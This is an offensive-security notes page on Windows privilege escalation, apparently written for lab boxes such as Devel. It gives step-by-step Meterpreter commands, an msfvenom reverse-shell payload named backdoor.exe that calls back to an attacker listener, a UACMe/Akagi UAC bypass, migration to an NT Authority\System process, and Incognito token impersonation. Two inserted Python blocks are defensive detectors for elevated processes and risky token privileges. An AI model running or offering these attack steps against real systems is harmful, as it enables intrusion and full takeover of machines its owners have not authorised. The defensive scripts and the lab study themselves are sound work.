root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Windows Kernel Exploit

The Windows kernel is the kernel that ships with every version of Microsoft Windows. It operates as a traditional kernel, with a few exceptions that come from its user-facing design philosophy.

Look for Windows boxes that have a kernel exploit vulnerability (Devel is an example).

One of the basic commands for privilege escalation on Windows is Meterpreter's getsystem. It runs through a plethora of techniques, but it can also fail.

Check out the Devel box writeup; it goes into the kernel exploitation side in more detail.

Link to Devel Writeup

Bypassing UAC with UACMe

UAC (User Account Control) has been present in every version of Windows from Windows Vista to Windows 11.

It ensures that changes to the operating system require approval from the administrator or from a user account that is a member of the local Administrators group.

UACMe is an open source tool that can be used to bypass Windows UAC by leveraging various techniques.

You can get it here

To search for a running process:

pgrep explorer

To migrate to that process (this gives you a 64-bit Meterpreter session):

migrate 2223

To check whether the user has elevated privileges:

getprivs

To list users:

net user

To check whether those users are in the local Administrators group:

net localgroup administrators

The version of Akagi you'll use depends on the version of Windows you are running.

To run Akagi, first create a backdoor.exe using msfvenom:

msfvenom -f exe -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -o backdoor.exe

Then set up the multi handler in Metasploit, using the same payload, LHOST and LPORT you gave msfvenom:

use exploit/multi/handler
set payload windows/shell_reverse_tcp
set LHOST 10.10.10.10
set LPORT 4443
run

Now, in the Meterpreter session you already have, create a C:\Temp directory and upload the two files:

upload backdoor.exe
upload Akagi64.exe

Use method key 23, which essentially takes advantage of the package manager on Windows:

.\Akagi64.exe 23 C:\Temp\backdoor.exe

Running this bypasses UAC, and backdoor.exe is executed with administrative privileges. You should get a Meterpreter shell on your handler; check the privileges again:

getprivs

You'll see the user now has elevated privileges. List the processes:

ps

From here you can migrate to a process running as "NT Authority\System":

migrate PID

This gives you a Meterpreter shell as "NT Authority\System".

For Windows 10 you can use key 33; check the tool's documentation to read more about the available methods.

To elevate privileges by bypassing UAC, you need access to a user that is a member of the local Administrators group.
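A defender-side check for the flow above, added here as an example that is not part of these notes, UACMe or Metasploit: it scans process-creation records shaped like Windows Security event 4688 (field names NewProcessName, TokenElevationType, ParentProcessName, SubjectUserName) and flags any process that received a fully elevated token (%%1937) while running from a user-writable directory such as C:\Temp. The directory list and the sample records are constructed assumptions. Auto-elevation bypasses of this kind need an account that is in the Administrators group and is running under Admin Approval Mode with UAC below "Always notify"; the check looks for the elevated process the bypass leaves behind rather than for the bypass itself.

```python
"""Flag process creations that look like the aftermath of a UAC bypass.

Added example for this page: not code from these notes, UACMe or Metasploit.
Records are dicts using Windows Security event 4688 field names
(NewProcessName, TokenElevationType, ParentProcessName, SubjectUserName);
the directory list and the sample records below are constructed assumptions.
"""
import re

# TokenElevationType values as written into event 4688.
TOKEN_ELEVATION_DEFAULT = "%%1936"  # no split token (e.g. SYSTEM, standard user)
TOKEN_ELEVATION_FULL = "%%1937"     # full administrator token
TOKEN_ELEVATION_LIMITED = "%%1938"  # filtered token of an admin in Admin Approval Mode

# Locations a non-privileged user can write to (assumed list, lower-case regexes).
USER_WRITABLE_DIRS = [
    r"^[a-z]:\\temp\\",
    r"^[a-z]:\\windows\\temp\\",
    r"^[a-z]:\\programdata\\",
    r"^[a-z]:\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\",
]


def is_user_writable(path):
    """True when the executable path sits under one of the writable directories."""
    p = path.lower()
    return any(re.match(pattern, p) for pattern in USER_WRITABLE_DIRS)


def suspicious_elevations(records):
    """Return 4688-style records with a full admin token executing from a writable path.

    A legitimately elevated admin tool also gets %%1937, but it normally lives
    under Program Files or System32; an elevated binary in Temp or a profile
    directory is what a bypass leaves behind.
    """
    return [
        r for r in records
        if r.get("TokenElevationType") == TOKEN_ELEVATION_FULL
        and is_user_writable(r.get("NewProcessName", ""))
    ]


def describe(record):
    """One-line summary an analyst can read: who, what, launched by what."""
    return "{user} ran {proc} (parent: {parent})".format(
        user=record.get("SubjectUserName", "?"),
        proc=record.get("NewProcessName", "?"),
        parent=record.get("ParentProcessName", "?"),
    )


# Constructed sample events; none of these are real logs.
SAMPLE_4688 = [
    {"SubjectUserName": "alice", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "TokenElevationType": TOKEN_ELEVATION_LIMITED,
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    # Constructed hit: elevated binary in C:\Temp, parent chosen to mirror the
    # "package manager" description of key 23 in the notes above.
    {"SubjectUserName": "alice", "NewProcessName": r"C:\Temp\backdoor.exe",
     "TokenElevationType": TOKEN_ELEVATION_FULL,
     "ParentProcessName": r"C:\Windows\System32\pkgmgr.exe"},
    {"SubjectUserName": "SYSTEM", "NewProcessName": r"C:\Windows\System32\svchost.exe",
     "TokenElevationType": TOKEN_ELEVATION_DEFAULT,
     "ParentProcessName": r"C:\Windows\System32\services.exe"},
    # Legitimately elevated admin tool: full token, but from Program Files.
    {"SubjectUserName": "bob", "NewProcessName": r"C:\Program Files\Vendor\admintool.exe",
     "TokenElevationType": TOKEN_ELEVATION_FULL,
     "ParentProcessName": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in suspicious_elevations(SAMPLE_4688):
        print("ALERT:", describe(hit))
```

Event 4688 is only written when Audit Process Creation is enabled, and legitimately elevated tools also show %%1937, which is why the path filter does the real work; the parent process name is carried through so whoever triages the alert can see what launched the binary.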

Access Token Impersonation

SeAssignPrimaryToken: This allows a user to impersonate tokens

SeCreateToken: This allows a user to create an arbitrary token with administrative privileges

SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges
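An audit check for the three privileges just listed, added as an example that is not part of these notes or of Meterpreter: it parses the table printed by `whoami /priv` (the sample output below is constructed) and reports which of SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege and SeCreateTokenPrivilege the current token holds. It counts privileges that are present but Disabled as well, because a process that holds a privilege can switch it on; the audit is about what the token carries, not what is currently enabled.

```python
"""Parse `whoami /priv` output and flag privileges that enable token abuse.

Added example for this page, not part of the original notes or any tool it
names. The sample output below is constructed; the flagged set is the three
privileges the notes describe, written with their full Windows names.
"""
from dataclasses import dataclass

# Privileges that let a process obtain or create another security context.
TOKEN_ABUSE_PRIVILEGES = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeCreateTokenPrivilege",
}


@dataclass(frozen=True)
class Privilege:
    name: str
    description: str
    state: str  # "Enabled" or "Disabled"


def parse_whoami_priv(text):
    """Parse the table printed by `whoami /priv` into Privilege records."""
    privs = []
    in_table = False
    for line in text.splitlines():
        if line.startswith("Privilege Name"):
            in_table = True  # header row; the next line is the ===== separator
            continue
        if not in_table or not line.strip() or line.startswith("="):
            continue
        parts = line.split()
        # First column is the name, last is the state, the rest is the description.
        privs.append(Privilege(parts[0], " ".join(parts[1:-1]), parts[-1]))
    return privs


def token_abuse_privileges(privs):
    """Return held privileges (Enabled or Disabled) that permit token abuse.

    A disabled privilege still counts: the token carries it, and a process can
    enable it later, so the audit looks at what is held, not what is on.
    """
    return [p for p in privs if p.name in TOKEN_ABUSE_PRIVILEGES]


# Constructed sample: the kind of table a service account prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""

if __name__ == "__main__":
    for p in token_abuse_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{p.name:32} {p.state}")
```

Service accounts such as LOCAL SERVICE and NETWORK SERVICE hold SeImpersonatePrivilege by default, so a hit there is expected; what the audit is for is spotting these privileges on accounts that run user-facing or internet-exposed code, where the mitigation is to move that code to an account (or a group policy user-rights assignment) that does not carry them.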

The Incognito module is a built-in Meterpreter module (originally a standalone application) that lets you impersonate user tokens after exploitation. We can use it to display a list of the tokens we can impersonate.

To get a 64-bit Meterpreter after your initial session, migrate into explorer:

pgrep explorer
migrate 2222

If "SeImpersonatePrivilege" is present, load the Incognito module in Meterpreter:

load incognito

To list tokens (you should see both delegation tokens and impersonation tokens):

list_tokens -u

To impersonate a token:

impersonate_token "name of the token"

To check that it worked:

getuid

Then check the tokens again:

list_tokens -u

If there is one for "NT Authority\System", go ahead and impersonate it:

impersonate_token "name of the token"

If neither a delegation token nor an impersonation token is available, you can fall back to a Potato attack.